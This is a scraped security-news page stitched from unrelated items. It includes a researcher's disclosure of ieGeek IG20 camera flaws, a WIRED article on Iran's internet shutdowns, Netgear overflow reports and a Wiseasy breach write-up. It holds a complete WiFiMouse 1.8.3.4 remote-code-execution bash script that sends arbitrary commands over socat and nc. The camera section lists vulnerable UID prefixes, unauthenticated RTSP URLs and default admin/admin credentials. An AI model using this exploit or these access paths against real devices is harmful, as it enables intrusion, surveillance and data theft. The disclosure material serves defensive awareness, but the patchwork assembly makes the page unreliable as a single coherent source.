ieGeek IG20 hipcam RealServer V1.0 is vulnerable to Incorrect Access Control. The algorithm used to generate device IDs (UIDs) for devices that utilize Shenzhen Yunni Technology iLnkP2P suffers from a predictability flaw that allows remote attackers to establish direct connections to arbitrary devices.

*   ieGeek IG20 Issues/Vulnerabilities
    *   UID Weakness CWE-340
    *   Unauthenticated / Default auth access to camera stream via RTSP protocol CWE-284
*   Default P2P Camera feed activated and sent to a server in plaintext CWE-284
    *   Access to files stored on the camera CWE-284
*   Admin Panel – Basic Authentication in use / Weak Password Requirements CWE-521 / CWE-287
*   JavaScript injection (DOM-based) CWE-79
*   HTTP Response Header Injection/Splitting CWE-644
*   Device NMAP scan
*   The Listing On Amazon
*   Update 01 Sep 2022 – Product Still Listed On Amazon
*   Update: 01 Sep 2022
*   Consumer Recommendations
*   Q&A
    *   Are ieGeek cameras secure?
    *   What are the real risks of ieGeek cameras?
*   Cheap CCTV Invites Outside Threats Into Your Home\[4\]
*   References
    *   Please login to bookmark
    *   Don’t miss:

**_Amazon’s “highly rated” ieGeek brand continues to present a number of security vulnerabilities._**

On the 19th of Aug 2022 I set out to purchase a CCTV Camera from Amazon, I read over the reviews of the ieGeek IG20, and it seemed great, the value too. For just £29.99 I’d get myself a great looking CCTV Camera, packed full of features. It has night vision, Smartphone access, Motion Detection, Plug & Play, It’s waterproof and it can connect via WiFi or Ethernet. Great, I was sold. However, I failed to do any research on the brand specifically.

The camera arrived the following day, and later that day I got around to setting it up. I first noticed that on the back of the camera, there was a sticker with a UID printed, along with a Factory default Username & Password combination, consisting of admin/admin.

**UID Weakness CWE-340**

The UID appears to be predictable.The UID in our case, will look like this: **_AAFF-123456-ABCDE_** – depending on the make and model.

*   **UID p1**: _Same 4 letters at the start._
*   **UID p2:** _6 numbers at random in the middle._
*   **UID p3**: _5 random letters at the end._

Evidently, having just this basic knowledge of the UID and using the default credentials, the camera feed could be accessed using the software provided by ieGeek from their website by testing each UID value. This can leave a number of IP cameras vulnerable to unauthorised viewing with the privacy of users at risk.

Below are some more vulnerable prefixes running the same crappy firmware.

AAAA

AABB

AACC

AAES

AIPC

AAFF

BBBB

CAM

CAMERA

CCCC

DDDD

DEAA

EEEE

ELSA

ELSO

ESCM

ESN

ESS

EUA

EYE

FCARE

FDTAA

FFFF

FOUS

GCAM

GCMN

GGGG

GKW

HHHH

HRXJ

HSL

HVC

HWAA

HZD

HZDA

HZDB

HZDC

HZDN

HZDX

HZDY

HZDZ

IIII

ISRP

JWEV

MCI

MDI

MEIA

MMMM

MSE

MSI

MTE

NIP

NNNN

NTP

OBJ

PHP

PISR

POLI

PPCN

PPPP

PTP

QSHV

ROSS

SECRUI

SPCN

SSAA

SSSS

SURE

SXH

TTTT

UUUU

VIEW

VSTA

VSTB

VSTC

VSTD

VSTF

WCAM

WGKJ

WHI

WNR

WNS

WNV

WWWW

WXH

WXO

XCPTP

XHA

XLT

XWL

ZLD

ZZZZ

AVA

**Unauthenticated / Default auth access to camera stream via RTSP protocol CWE-284**

By default, one can easily access the camera’s stream externally or internally depending on your router/network configuration, with our without means of Authentication.

*   **Zero Authentication:** rtsp://+IP+/11
*   **Default Auth:** rtsp://admin:\[email protected\]+IP+/11

_**Replace +IP+ with your local or external IP**_.

Here is a screenshot of the Default RTSP settings, requiring Zero authentication.

**Default P2P Camera feed activated and sent to a server in plaintext CWE-284**

The cloud function of the camera uses the P2P protocol to send and make requests back to a server based in China in plaintext. It was found that all connections back to this were made in plaintext regardless of protocol, this includes the viewing of the camera’s stream and control. HTTPS was not found to be implemented anywhere on the camera.

**Access to files stored on the camera CWE-284**

The following directories can be viewed using the default login:

*   http://+IP+/tmpfs
*   http://+IP+/js
*   http://+IP+/lib
*   http://+IP+/log
*   http://+IP+/resources
*   http://+IP+/sd
*   http://+IP+/swfs

The number of links discovered showed that the SD card, log files and website front-end code were accessible from the web interface. This includes any footage that has been recorded by the device and stored on the external SD card.

I decided to check out shodan.io and searched for “hipcam realserver”. Shodan is a Google like database of Connected Devices, if you like. It produced 93,312 results of addresses that had port 554 exposed to the internet. As I browsed these I also discovered a number of addresses that also had Port 80 exposed, hosting the same ‘IP Camera’ front page with login. With what I have discovered it is possible for each of these devices to be accessed via default credentials, or if the admin credentials are changed, Using VLC player, I could potentially connect to each of these camera streams without the need to authenticate.

**Admin Panel – Basic Authentication in use / Weak Password Requirements CWE-521 / CWE-287**

When the camera is booted up, a web server is spawned and requires a login to gain access. Default credentials were then used to gain access and there was no setup to force change of the default password in place. Burpsuite caught this login process; the session was found to be using HTTP Basic Authentication to handle the username and password. The Base64 translates to admin:admin.

**JavaScript injection (DOM-based) CWE-79**

Data is read from **document.cookie** and passed to **eval()**

    
    var strCookie=document.cookie;
    var arrCookie=strCookie.split('; ');
    var arr=arrCookie[i].split('=');
    return unescape(arr[1]);
    var cooktype=getcookie('cookmun');
    var string = eval("'cgi-bin/hi3510/param.cgi?cmd=setimageattr&-image_type="+cooktype+"&-default=on'");

Using various different methods of escaping. Stored XSS was also prevalent in many places within the admin panel that used user input. Example: FTP Upload settings.

**HTTP Response Header Injection/Splitting CWE-644**

The web application is also evidently vulnerable to HTTP response header injection, see PoC below. This also led me to discover i was able to break out of the response.

Your options for exploitation vary depending on the type of response you’re injected into and also where in the response you’re placed!

Here we’ve added a “malicious cookie” which will be set in the browser. As mentioned earlier i was also able to break into the body, or out of the headers through double CRLFs (%0d%0a%0d%0a) **_see below_**.

When user input is insecurely inserted into the headers of server responses, HTTP Header Injection vulnerabilities are created. They are based on the theory that an attacker can make the server generate a response that contains carriage-return and line-feed characters (or, respectively, %0D and %0A in their URI encoded forms), within the server response header, and/or that the attacker may be able to add specially created headers. Attacks like response splitting, session fixation, cross-site scripting, and malicious redirection are all possible using header injection.

Often, the injection of headers is not the main attack; rather, it is merely a method for accessing or exploiting another flaw. For instance, if a hacker is able to inject a payload through HTTP header injection, they may target a website that is susceptible to cross-site scripting in the Referer header or in a cookie value etc.

**Device NMAP scan**

    Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-28 00:42 BST
    Nmap scan report for 192.168.1.116
    Host is up (0.0088s latency).
    Not shown: 996 closed ports
    PORT     STATE SERVICE
    80/tcp   open  http Hipcam RealServer/V1.0
    554/tcp  open  rtsp
    1935/tcp open  rtmp Real-Time Messaging Protocol
    8080/tcp open  http-proxy ONVIFservice
    MAC X (Shenzhentong BO Weitechnology) SHENZHEN TONG BO WEI TECHNOLOGY Co.,LTD
    Device type: general purpose
    Running: Linux 2.6.X|3.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
    OS details: Linux 2.6.32 - 3.10
    Network Distance: 1 hop
     

Anyway, I decided enough is enough with this trash device and unplugged it from my network, packaged it back up and arranged a return with Amazon.

**The Listing On Amazon**

At the time of writing, the listing is still available, however, I reached out to Amazon and made them fully aware of everything, including my intention to publish this article, and they advised me that the product listing would be “temporarily” removed today, **28th Aug 2022**, pending further Investigation.  
The listing can be seen here **_\[if still available\]_**

It has to be worth noting, that there was an investigation by Which.co.uk see reference \[3\] in July 2021, that details a line of similar flaws, consequently, Amazon removed the said ieGeek branded camera from sale on its website. The which? investigation revealed another device from the same manufacturer can be easily hacked by cybercriminals.

> The £40 camera, which was labelled Amazon’s Choice, had more than 8,500 reviews (as of June 22 2021), including 68% giving the full five stars.
> 
> If you own the ieGeek Security Outdoor Camera 1080p, you should change its default password immediately, or better still, stop using it.
> 
> https://www.which.co.uk/news/article/iegeek-security-camera-removed-from-sale-following-which-investigation-ajW4t0g7bnGj

So the question remains, why do Amazon allow Manufacturers to list products irrelevant of the manufacturer having been Flagged, and Delisted in the past? A better system needs to be in place. Yes, I understand there can be a new line of products/models but surely amazon should be seen to be doing more to prevent devices like this from appearing on their website. The privacy and security of their customers should be paramount.

**Update 01 Sep 2022 – Product Still Listed On Amazon**

We’ve noted that the product is still available to purchase on Amazon, despite us being told that it would be removed, pending an investigation. We figured we’d add a screenshot, just for clarity.

Here is the screenshot of a mail I received from the Amazon Representative on the 28th of August, this email states the item “may be temporarily unavailable”, which contradicts what she told me on the telephone. This email arrived in my mailbox very shortly after I had a call with the same lady, Roxy.

**Update: 01 Sep 2022**

We’ve been made aware of another article from Which.co.uk, this second article was published in late 2021, after the earlier-mentioned article. Their second write-up clearly paints a very different picture, one could easily say it’s misleading given what has been uncovered in this report. It has to be worth mentioning that my ieGeek device, and probably many many others, was still running the same vulnerability-ridden firmware that Which.co.uk spoke out against in their first write-up, as has been verified by the team here at risec and elsewhere. There was no obvious offer of any firmware upgrade, at least to my knowledge. Anyway, see some quotes from the second write-up below.

> **Millions of CamHi wireless cameras made more secure after hacking risk**
> 
> Following a change by HiChip, all CamHi app devices when installed now must have their default password changed by the user.
> 
> HiChip has agreed to enforce a strong password policy, particularly blocking generic terms such as ‘password’ and ‘admin’.
> 
> For CamHi devices that are already set up in people’s homes, the app will remind them to change the default password and warn them if what they have chosen is weak
> 
> **_MISLEADING_**: https://www.which.co.uk/news/article/millions-of-camhi-wireless-cameras-made-more-secure-after-hacking-risk-aezzW2u2ELsl

**_We have reached out to Which.co.uk and have yet to receive any notable response._**

**Consumer Recommendations**

If you value your privacy, and security as much as we do, please remove the device from service. It is simply unfit for purpose. If you bought it from Amazon, go and arrange a return as this device is in clear breach of their merchant conditions.

Research each device thoroughly before buying, and check it’s security reputation.

_**Be Aware**_**_:_** _Endless numbers of IP cameras of other Brands also use the Hipcam RealServer service; I am unable to check the configuration of these devices specifically, but one would be led to believe they are all implemented similarly. Sadly, there doesn’t seem to be a method to warn anyone utilising these IP Cameras that they are exposed._

On a final note, take amazon’s reviews with a pinch of salt, and always do your homework. Next time your about to purchase a connected device, IoT(Internet-of-Things), do a quick google query, something like, “vulnerable BRAND” or “exploit BRAND”

**Q&A****Are ieGeek cameras secure?**

According to our research, and many others, ieGeek cameras are not secure. The devices they seem to be pushing out in 2022 are vulnerable in a number of ways as detailed in this article. Fundamentally, they lack proper encryption, and, are shipped to consumers riddled with security holes. One can only ask themselves, is it intentional? _**tldr; Given the research of the team here at RiSec, and research conducted elsewhere, we can categorically say ieGeek’s cameras are not secure in 2022.**_

**What are the real risks of ieGeek cameras?**

By using these devices that lack proper safety and security standards, your private data is at serious risk of being exposed, **a bad actor may able to gain complete control of the cameras**. This fundamentally opens up your entire network to further attack, making it much easier for a bad actor to reach an end goal.

Cheap CCTV cameras tend to be vulnerable to at least one of the following types of hacking:

1.  They have a weak default password and username setting, which can be easily discoverable. If the user doesn’t change those settings, it’s very easy for hackers to find their way into your camera control system, in every case, there is no prompt in the Admin panel when logging in, advising you to chase any password.
2.  They don’t encrypt your data so that your home router password input is un-encrypted and accessible to any cyber attacker, or themselves.., same applies with any SMTP email info provided, along with any FTP info provided to the device. By using the home router password, they can gain access to other devices on your home network, can monitor your Internet history and any stored data on connected devices.
3.  They let external users gain root access to the device itself, allowing hackers to take control, launch attacks from your device, and exfiltrate data.

**Cheap CCTV Invites Outside Threats Into Your Home\[4\]**

> There are three main security issues you need to look for when buying your CCTV camera. Popular wireless security camera brands that are sold on online marketplaces like Amazon, but also eBay share common security flaws.
> 
> As a rule of thumb, brands that are not well-known outside of the online market should be avoided at all cost. Affordable CCTV solutions from Shenzhen-based factories in China sometimes fail to meet wireless safety standards.
> 
> Brands that have been tested for vulnerability and that you should avoid are the following; ieGeek, Sricam, SV3C, and Vstarcam. All come with a friendly price tag, but they are quick to join the list of CCTV cameras that put your privacy and security at risk.
> 
> Tested by a professional security lab, Context Information Security, “cheap CCTV cameras show that they fail to prioritise customers’ security even those that are bestsellers in online marketplaces”
> 
> \[4\]

Update: **_21/09/2022_** – After some back-and-forth correspondence with the vendor, **_ieGeek_**, they have disputed that the ieGeek IG20 is an insecure device, despite our evidence to the contrary, they also cited an invalid misleading Which.co.uk\[5\] post as seen above.

**CVE Approved:** **_CVE-2022-38970_**\[6\]

**_Got some crazy story? thoughts on this article? We’d love to hear from you below!_**

_Coming up next, I will be covering a Chinese “Mini-PC” that was shipped to me loaded with Malware._

Ciao, for now.

**_References_**

Amazon product listing\[1\]

IG20 ieGeek store page\[2\]

Which investigation ieGeek\[3\]

Cheap CCTV Sold With Known Vulnerabilities\[4\]

Which.co.uk Misleading\[5\]

**_CVE-2022-38970_**\[6\]

Suggest an edit to this article

Go to Cybersecurity Knowledge Base

Got to the Latest Cybersecurity News

Go to Cybersecurity Academy

Go to Homepage

_Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today_.

**_Remember,_** _CyberSecurity Starts With You!_

*   Globally, **30,000 websites** are hacked daily.
*   **64% of companies** worldwide have experienced at least one form of a cyber attack.
*   There were **20M breached records** in March 2021.
*   In 2020, ransomware cases grew by **150%**.
*   Email is responsible for around **94% of all malware**.
*   **Every 39 seconds,** there is a new attack somewhere on the web.
*   An average of **around 24,000 malicious mobile apps** are blocked daily on the internet.

Bookmark

**Please login to bookmark**

No account yet? Register

*   About
*   Latest Posts

Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK.

I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated...

I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK.

I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

Share the word, let's increase Cybersecurity Awareness as we know it

CVE-2022-38970: ieGeek Vulnerabilities still prevalent in 2022 - Amazon Ft. IG20

Tenda i9 v1.0.0.8(3828) was discovered to contain a buffer overflow via the formWifiMacFilterSet function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

CVE-2022-40101

Tenda i9 v1.0.0.8(3828) was discovered to contain a buffer overflow via the formWifiMacFilterGet function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

CVE-2022-40105

Amid protests against the killing of Mahsa Amini, authorities have cut off mobile internet, WhatsApp, and Instagram. The death toll continues to rise.

In the Iranian city of Shahrud, surrounded by hundreds of protesters, two women climb onto a platform and defiantly wave their hijabs above their heads in an act of public defiance. The scene, caught on video, is posted online by the 1500tasvir Instagram account. In recent days, the account has published dozens of videos from Iranian towns and cities as thousands of people protest the death of 22-year-old Mahsa Amini, who died in police custody after being arrested by Iran’s “morality police.”

In another video shared by 1500tasvir, women burn their headscarves while chanting for freedom. Protesters are shown confronting police officers in another. And other videos claim to show people bleeding, injured, or dead, following brutal clashes with police officers as protests have spread to more than 80 cities across Iran. “They stood against the police, who are armed, and they \[protesters\] just shout at them,” says one person behind the 1500tasvir Instagram account, whom WIRED is not naming to protect their safety.

The 1500tasvir account was set up in 2019 following widespread protests in which hundreds of people were killed by police. During those protests, Iranian officials totally shut down the internet, stopping people from organizing protests and limiting the information flowing in and out of Iran. Now history is repeating itself. But this time, more people are watching.

As thousands of people have taken to the streets to protest the death of Amini this week, Iranian officials have repeatedly shut down mobile internet connections and disrupted the services of Instagram and WhatsApp, two of the most popular social media services in the country. The internet shutdowns are the largest since November 2019 and raise fears about further atrocities. So far, more than 30 people have reportedly been killed, while the Iranian government has admitted to 17 deaths.

“Shutting down mobile internet service has become a go-to for the Iranian government when dealing with civil unrest,” says Doug Madory, director of internet analysis at monitoring firm Kentik, who has been following the shutdowns. “People were using these services to share videos of the protests and the government’s crackdown, so they became targets of government censorship.”

Iran started shutting the internet down on September 19 as protests around Amini’s death gained momentum. Since then, multiple internet-monitoring organizations, including Kentik, Netblocks, Cloudflare, and the Open Observatory of Network Interference, have documented the disruptions. Mobile network operators, including the country’s biggest providers—Irancell, Rightel, and MCI—have faced rolling blackouts, the groups say. Multiple mobile providers have lost connectivity for around 12 hours at a time, with Netblocks saying it has seen a “curfew-style pattern of disruptions.” Felicia Anthonio, who leads NGO Access Now’s fight against internet shutdowns, says the group’s partners have reported that text messages containing Amini’s name have been blocked. “If you’re sending a message containing that name, it doesn’t go through,” Anthonio says.

The clampdown against Instagram and WhatsApp started on September 21. While shutting down mobile connections is hugely disruptive, blocking access to WhatsApp and Instagram cuts off some of the only remaining social media services in Iran. Facebook, Twitter, and YouTube have been banned for years. State-backed Iranian media said it was unclear how long the blocks on Instagram and WhatsApp would last but that they had been imposed for “national security” reasons. “It does seem they are targeting these platforms that are the lifeline for information and communication that’s keeping the protests alive,” says Mahsa Alimardani, an academic at the Oxford Internet Institute who has extensively studied Iran’s internet shutdowns and controls.

The 1500tasvir team member says the account, which is run by a group of around 10 core people both inside and outside of Iran, is posting videos to document the protests. People on the ground send the videos—in some areas, patchy connections are available and fixed Wi-Fi connections still work​​—and the group checks the content before posting it online. The group says it is receiving more than 1,000 videos per day, and its Instagram account has more than 450,000 followers.

Internet shutdowns can have a “huge” impact on protests, the 1500tasvir team member says, because when people around Iran can’t see that others are protesting, they may be likely to stop themselves. “When you … see other people feel the same way, you get more brave. You are more enthusiastic to do something about it,” they say. “When the internet is cut off … you feel alone.”

The blocks against WhatsApp also appear to have impacted people outside of Iran. People using Iranian +98 telephone numbers have complained that WhatsApp has been slow to work or not functioning at all. WhatsApp has denied it is doing anything to block Iranian phone numbers. However, the Meta-owned company has refused to provide any more information on why +98 numbers outside of Iran have faced problems. “There's something strange going on, and it’s likely to do with the way Iran is implementing censorship on these different platforms because it does seem a bit more targeted,” Alimardani says.

In recent years, governments wanting to silence their citizens or control their behavior have increasingly turned to draconian internet shutdowns as tools of suppression. In 2021, 23 countries, from Cuba to Bangladesh, shut the internet down a collective 182 times. Iranian officials are no strangers to the practice. Anthonio says Iran’s latest internet shutdown is the third time the country has disrupted the internet in the past 12 months. “We continue to see that internet shutdowns also provide a cover for authorities to hide atrocities that are perpetrated against people during protests,” Anthonio says.

Iran’s current shutdown is the biggest since its November 2019 protests, when people took to the streets over drastic fuel price rises. More than 200,000 protesters were faced with a brutal response from the police: Amnesty International has documented the names of 321 people who were killed during the protests, but the NGO says the figure is likely far higher. (Previous estimates say up to 1,500 people were killed and 4,800 were injured.)

Throughout those protests, Iranian officials conducted a complete internet blackout. All internet connections were blocked, preventing people from telling the world what was happening. (The country’s home-brewed, heavily censored, intranet remained available.) So far, the internet shutdowns following Amini’s death haven’t reached the same scale. However, experts worry they may continue to grow the longer the protests last. That could also mean an increase in police violence. The Center for Human Rights in Iran says it has already recorded 36 deaths linked to the protests, including 15- and 16-year-old boys.

Despite the internet shutdowns, footage from the protests has managed to get out. So far. “I’m seeing more content and more footage from these protests than I think I even saw during November 2019,” Alimardani says. However, when the internet is disconnected everything can go silent. “I don’t get any messages in the past hour. Because they cut off the internet,” the 1500tasvir member, who is based outside of Iran, says in a phone call. “They don’t want the world to know how cruel they are.”

Iran’s Internet Shutdown Hides a Deadly Crackdown

Netgear Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router R7000-V1.0.11.134_10.2.119 is vulnerable to Buffer Overflow via the wl binary in firmware. There is a stack overflow vulnerability caused by strncat

**Vulnerability Report**

Vendor: NETGEAR

Product: Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router

Version: R7000-V1.0.11.134\_10.2.119 (Download Linkhttps://www.netgear.com/support/download/?model=R7000)

Type: Stack-based Buffer Overflow

**Vulnerability description**

We found a buffer overflow vulnerability in AC1900 with R7000-V1.0.11.134\_10.2.119 firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution

**Remote Command Execution**

In wl binary, there is a stack overflow vulnerability caused by strncat.

In function 0x461bc, the value of pcVar1 is obtained through fgets with the maximum length 0x200 byte. The value of pcVar1 will be copied to ppcVar4 (actually copied to the local\_70 array by moving the pointer) 

The local_70 is passed as parameter to function 0x45e18. 

In function 0x45E18, the a2 parameter is copied to v16. v16 will be copied to v12. Then v12 will be passed as a parameter to the function pointer (v3+1).  

The function pointer may point to function 0x3c0c4. 

In function 3xc0c4, a3 (with a maximum length of 0x200) will be assigned to v5.

The v5 will be copied to v19 through strncat. The buffer of v19 is 100 bytes. So a buffer overflow may occur.

CVE-2022-37235: Bug-Report/netgear-R7000-0x461bc.md at main · Davidteeri/Bug-Report

Netgear Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router R7000-V1.0.11.134_10.2.119 is vulnerable to Buffer Overflow via the wl binary in firmware. There is a stack overflow vulnerability caused by strncpy.

**Vulnerability Report**

Vendor: NETGEAR

Product: Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router

Version: R7000-V1.0.11.134\_10.2.119 (Download Linkhttps://www.netgear.com/support/download/?model=R7000)

Type: Stack-based Buffer Overflow

**Vulnerability description**

We found a buffer overflow vulnerability in AC1900 with R7000-V1.0.11.134\_10.2.119 firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution

**Remote Command Execution**

In wl binary, there is a stack overflow vulnerability caused by strncat.

In function 0x461bc, the value of pcVar1 is obtained through fgets with the maximum length 0x200 byte. The value of pcVar1 will be copied to ppcVar4 (actually copied to the local\_70 array by moving the pointer) 

The local_70 is passed as parameter to function 0x45e18. 

In function 0x45E18, the a2 parameter is copied to v16. v16 will be copied to v12. Then v12 will be passed as a parameter to the function pointer (v3+1).  

The function pointer may point to function 0x38b90. 

In function 0x38b90, a3 (with a maximum length of 0x200) will be assigned to v5. 

The v5 will be copied to v62 through strncpy. The buffer of v62 is 32 bytes. So a buffer overflow may occur.

CVE-2022-37234: Bug-Report/netgear-R7000-0x461bc-strncpy.md at main · Davidteeri/Bug-Report

Last month Tech Crunch reported that payment terminal manufacturer Wiseasy had been hacked. Although Wiseasy might not be well known in North America, their Android-based payment terminals are widely used in the Asia Pacific region and hackers managed to steal passwords for 140,000 payment terminals.
How Did the Wiseasy Hack Happen?
Wiseasy employees use a cloud-based dashboard for remotely

Last month Tech Crunch reported that payment terminal manufacturer Wiseasy had been hacked. Although Wiseasy might not be well known in North America, their Android-based payment terminals are widely used in the Asia Pacific region and hackers managed to steal passwords for 140,000 payment terminals.

**How Did the Wiseasy Hack Happen?**

Wiseasy employees use a cloud-based dashboard for remotely managing payment terminals. This dashboard allows the company to perform a variety of configuration and management tasks such as managing payment terminal users, adding or removing apps, and even locking the terminal.

Hackers were able to gain access to the Wiseasy dashboard by infecting employee's computers with malware. This allowed hackers to gain access to two different employee's dashboards, ultimately leading to a massive harvesting of payment terminal credentials once they gained access.

**Top Lessons Learned from the Wiseasy Hack****1 — Transparency isn't always the best policy**

While it is easy to simply dismiss the Wiseasy hack as stemming from an unavoidable malware infection, the truth is that Wiseasy made several mistakes (according to the Tech Crunch article) that allowed the hack to succeed.

For example, the dashboard itself likely exposed more information than it should have. According to Tech Crunch, the dashboard "allowed anyone to view names, phone numbers, email addresses, and access permissions". Although the case could be made that such information is necessary for Wiseasy to manage terminals on their customers' behalf, Tech Crunch goes on to say that a dashboard view revealed the Wi-Fi name and plain text password for the network that the payment terminal was connected to.

In a standard security environment, interface should never be designed to display passwords. The open display of customer information, without a secondary verification of the end-user, also goes against a zero-trust policy.

**2 — Credentials alone won't cut it**

A second mistake that likely helped the hack to succeed was that Wiseasy did not require multifactor authentication to be used when accessing the dashboard. In the past, most systems were protected solely by authentication credentials. This meant that anyone with access to a valid username and password could log in, even if the credentials were stolen (as was the case in the Wiseasy hack).

Multifactor authentication requires users to use an additional mechanism to prove their identity prior to accessing sensitive resources. Often this means providing a code that was sent to the user's smartphone by SMS text message, but there are many other forms of multifactor authentication. In any case, Wiseasy did not use multifactor authentication, there was nothing stopping hackers from logging in using stolen credentials.

**3 — Devices should be triple checked**

A possible third mistake might have been that of Wiseasy employees accessing sensitive resources from a non-hardened device. Tech Crunch reported seeing screen captures of the Wiseasy dashboard in which an admin user had remote access to payment terminals. The Tech Crunch article does not say that the admin's computer had been infected with malware, but since malware was used to gain access to the dashboard and the screen capture shows an admin logged into the dashboard, it is entirely possible that an admin's machine was compromised.

As a best practice, privileged accounts should only be used when required for a particular task (with standard accounts being used at other times). Additionally, privileged accounts should ideally be used only on designated management systems that have been hardened and are not used for any other tasks.

**4 — Stay on top of your own security**

Finally, the biggest mistake made in the Wiseasy hack was that the company seemingly (based on the Tech Crunch article) did not know that its accounts had been compromised until they were contacted by Buguard.

Buguard is a security company specializing in pen testing and dark web monitoring. Ideally, Wiseasy would be monitoring their own network for a potential breach and shut it down immediately when it's first noticed.

**Moving Forward: How to protect your own network from a similar hack**

The Wiseasy hack underscores the importance of adhering to long established security best practices such as requiring multifactor authentication and using dedicated management workstations for privileged operations. Subscribing to a zero-trust philosophy in your organization can solve a lot of these problems.

Additionally, it's important to have a way of knowing if your organization's accounts have been compromised. Otherwise, an attacker who has gained access to stolen account credentials could use those credentials indefinitely. One of the best ways to keep this from happening is to use Specops Password Policy. Specops maintains a database of billions of passwords that are known to have been compromised.

This database is kept up to date with passwords found on known breached password lists, as well as passwords being actively used in attacks. Specops Password Policy uses this information to make sure that none of your user's passwords have been compromised. If an account is found to be using a compromised password, the software will notify you so that you can disable the account or change its password right away. You can test out Specops Password Policy tools in your AD for free, anytime.

Whether you're bringing pen testing in house, moving toward a zero-trust infrastructure, or blocking known breached passwords from your Active Directory, there are a lot of ways to make sure your organization doesn't fall victim to the consequences of a malware attack like Wiseasy.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

IT Security Takeaways from the Wiseasy Hack

This Metasploit module utilizes the Unified Remote remote control protocol to type out and deploy a payload. The remote control protocol can be configured to have no passwords, a group password, or individual user accounts. If the web page is accessible, the access control is set to no password for exploitation, then reverted. If the web page is not accessible, exploitation will be tried blindly. This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.

Unified Remote Authentication Bypass / Code Execution

WiFiMouse version 1.8.3.4 suffers from a remote code execution vulnerability.

# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)  
# Date: 15-08-2022  
# Author: Febin  
# Vendor Homepage: http://necta.us/  
# Software Link: http://wifimouse.necta.us/#download  
# Version: 1.8.3.4  
# Tested on: Windows 10

#!/bin/bash  
printf "  
  WiFiMouse / MouseServer 1.8.3.4 Exploit

                    by FEBIN

"

printf "[*] Enter the Target IP Address: "  
read TARGET

rce(){  
printf "[*] Enter the Command to execute on the Target:  "  
read CMD

sh -c "echo 'key  9[R] WIN d';sleep 1;echo 'key  9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978  
}

dirlist(){

echo "[*] User's Home Directory Contents:"

echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-

while $true  
do  
printf "\nList Directory:> "  
read DIR  
echo "[+] Contents of $DIR: "  
echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-  
done

}

printf "  
 [1] Remote Command Execution  
 [2] Directory Listing

  "  
printf "Enter Your Choice (1 or 2) : "  
read CHOICE

if [[ $CHOICE == "1" ]]  
then  
rce  
elif [[ $CHOICE == "2" ]]  
then  
dirlist

else  
echo "[-] Invalid Choice!"  
fi

WiFiMouse 1.8.3.4 Remote Code Execution

An exploitable firmware downgrade vulnerability was discovered on the Netgear WPN824EXT WiFi Range Extender. An attacker can conduct a MITM attack to replace the user-uploaded firmware image with an original old firmware image. This affects Firmware 1.1.1_1.1.9 and earlier.

Tag

#wifi